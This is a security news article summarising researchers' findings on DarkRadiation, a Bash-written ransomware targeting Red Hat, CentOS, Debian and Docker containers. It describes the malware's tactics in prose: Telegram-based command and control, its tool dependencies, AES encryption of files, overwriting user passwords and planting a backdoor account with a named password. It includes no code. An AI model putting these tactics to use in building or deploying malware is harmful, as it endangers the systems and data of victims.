The newly discovered DarkRadiation ransomware chain is unlike any other ransomware family.
Trend Micro cybersecurity researchers have shared findings of a newly identified ransomware strain dubbed DarkRadiation. The ransomware strain is entirely written in Bash, and this aspect makes it difficult for most security software to detect it as a threat.
Its primary targets are Linux and Docker Cloud containers, which is particularly concerning for enterprises. Moreover, it relies on Telegram to initiate communication with its C&C server.
“The ransomware … targets Red Hat/CentOS and Debian Linux distributions. The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s),” researchers noted in their report.
About DarkRadiation Ransomware
The ransomware was first detected by Twitter user @r3dbU7z on 28 May. Later, it was analyzed by Trend Micro researchers. It is reported that the ransomware was discovered as part of a range of hacker tools through VirusTotal. The tools were hosted on the threat actor’s infrastructure in a directory titled “api_attack.”
Currently, there’s no information on the ransomware’s delivery methods or its in-the-wild attack evidence. But, when its different components were assessed, researchers noted that the developers want to use it to target Linux installs and Docker containers.
DarkRadiation Infection Chain Details
DarkRadiation’s infection chain is a multi-stage process comprising a complex set of Bash scripts and around six C&Cs, all offline when the report was published. The ransomware uses hardcoded API keys to communicate with Telegram bots, and the scripts have several dependencies, such as curl, wget, OpenSSL, sshpass, and pssh.
DarkRadiation downloads the required tools through the YUM/Yellowdog Updater, Modified if a device doesn’t support any of these. It is a python-based package manager used by popular Linux distros, including RedHat and CentOS.
In the final stage, the ransomware retrieves a list of users available on the infected device, overwrites their passwords with a mega-password, and deletes all shell users after creating a new user with the ID “Ferrum” and password “MegPw0rD3,” wrote SentinelOne researchers in a separate blog post.